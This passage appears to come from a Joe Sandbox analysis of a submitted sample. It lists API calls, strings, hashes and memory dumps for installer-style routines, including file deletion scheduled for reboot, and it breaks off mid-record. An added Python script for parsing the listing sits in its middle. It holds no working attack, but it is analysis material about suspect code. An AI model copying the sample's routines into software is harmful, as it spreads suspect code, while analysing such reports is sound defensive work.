                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                              • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                              • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                              • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                              APIs
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                              • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                              • String ID:
                                                                                              • API String ID: 4115351271-0
                                                                                              • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                              • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                              • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                              • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                              • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                              • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                              • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                              • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                              • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                              • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                              • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                              • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                              • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                              • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                              • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                              • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                              • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                              • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                              • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                              • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $ @$M$N
                                                                                              • API String ID: 1638840714-3479655940
                                                                                              • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                              • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                              • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                              • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
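The per-function records in this listing follow a fixed layout: an "APIs" block of `Name.MODULE(args), ref: ADDR` lines (some marked as part of a subcall), an optional "Strings" block of `text, xrefs: ADDR` lines, and metadata ending in an "API ID" summary. That regularity makes them easy to parse mechanically for triage instead of reading thousands of lines by hand. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. The sample text is a constructed excerpt copied from this page's listings (the CreateDirectoryW record and the DeleteFileW/FindFirstFileW record), and the watchlist categories are the example's own labels, not a Joe Sandbox classification.

```python
"""Parse the per-function "APIs"/"Strings" records of a Joe Sandbox
disassembly listing and summarise which functions touch the file system.

Added example for this page; the format assumptions (bullet character,
"ref:" / "xrefs:" suffixes, section titles) are taken from the listing
itself, and the watchlist is a hypothetical triage aid.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# One API call line, e.g.
#   • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
#   • Part of subcall function 00406064: CharNextW.USER32(...), ref: 004060C7
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# One string xref line, e.g.   • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
STRING_LINE = re.compile(r"^\s*•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)\s*$")
API_ID_LINE = re.compile(r"^\s*•\s*API ID:\s*(?P<apiid>.*?)\s*$")

# Hypothetical triage labels for APIs worth a second look in an installer/dropper.
WATCHLIST = {
    "DeleteFileW": "file deletion",
    "CreateDirectoryW": "directory creation",
    "FindFirstFileW": "directory enumeration",
    "FindNextFileW": "directory enumeration",
    "ReadFile": "file read",
    "SetFilePointer": "file read",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                       # address of the call site
    via_subcall: Optional[str] = None  # parent address when reported via a subcall


@dataclass
class FunctionRecord:
    api_id: str = ""
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, int]] = field(default_factory=list)


def parse_report(text: str) -> List[FunctionRecord]:
    """Split the listing into one FunctionRecord per "APIs" block."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    section = None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":                       # every record starts with its API block
            cur = FunctionRecord()
            records.append(cur)
            section = "apis"
            continue
        if cur is None:
            continue
        if s == "Strings":
            section = "strings"
            continue
        if s in ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = "meta"
            continue
        m = API_ID_LINE.match(line)
        if m:
            cur.api_id = m.group("apiid")
            continue
        if section == "apis":
            m = API_LINE.match(line)
            if m:
                cur.calls.append(ApiCall(m.group("api"), m.group("mod"),
                                         m.group("args").split(","),
                                         int(m.group("ref"), 16), m.group("sub")))
        elif section == "strings":
            m = STRING_LINE.match(line)
            if m:
                cur.strings.append((m.group("text"), int(m.group("ref"), 16)))
    return records


def triage(records: List[FunctionRecord]) -> List[dict]:
    """Per record: the distinct APIs called and the watchlist categories hit."""
    out = []
    for i, rec in enumerate(records):
        apis = sorted({c.api for c in rec.calls})
        cats = sorted({WATCHLIST[a] for a in apis if a in WATCHLIST})
        out.append({"index": i, "api_id": rec.api_id, "apis": apis, "categories": cats})
    return out


def deferred_ops(records: List[FunctionRecord]) -> List[Tuple[str, int]]:
    """Format strings announcing work postponed to the next reboot, with their xrefs."""
    return [(t, r) for rec in records for (t, r) in rec.strings if "on Reboot" in t]


# Constructed excerpt of this page's listing (two records, metadata shortened).
SAMPLE = """\
APIs
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
• CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
Memory Dump Source
• Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID:
• API String ID: 4115351271-0
APIs
• DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
• lstrcatW.KERNEL32(00467470,\\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
• FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
• FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
• FindClose.KERNEL32(?), ref: 00406E5F
Strings
• RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
• Delete: DeleteFile("%s"), xrefs: 00406DE8
• Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
• \\*.*, xrefs: 00406D2F
Memory Dump Source
"""

if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for row in triage(recs):
        print(row)
    print(deferred_ops(recs))
```

Running it on the constructed excerpt yields two records: the first is tagged "directory creation" from CreateDirectoryW, the second "directory enumeration" and "file deletion" from the FindFirstFileW/FindNextFileW/DeleteFileW trio, and `deferred_ops` surfaces the two "on Reboot" format strings, which are the quickest tell that the function can schedule deletions that only take effect after a restart. Against the full report the same parser runs over every record, so the interesting ones can be ranked by category instead of scrolled past.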
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                              • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                              • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                              • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                              • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                              • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                              • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                              Strings
                                                                                              • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                              • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                              • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                              • ptF, xrefs: 00406D1A
                                                                                              • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                              • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                              • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                              • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                              • \*.*, xrefs: 00406D2F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                              • API String ID: 2035342205-1650287579
                                                                                              • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                              • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                              • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                              • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                              • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                              • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                              • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                              • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                              • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004241C1,762323A0,00000000), ref: 00406902
                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                              • String ID: F$A
                                                                                              • API String ID: 3347642858-1281894373
                                                                                              • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                              • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                              • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                              • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                              • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
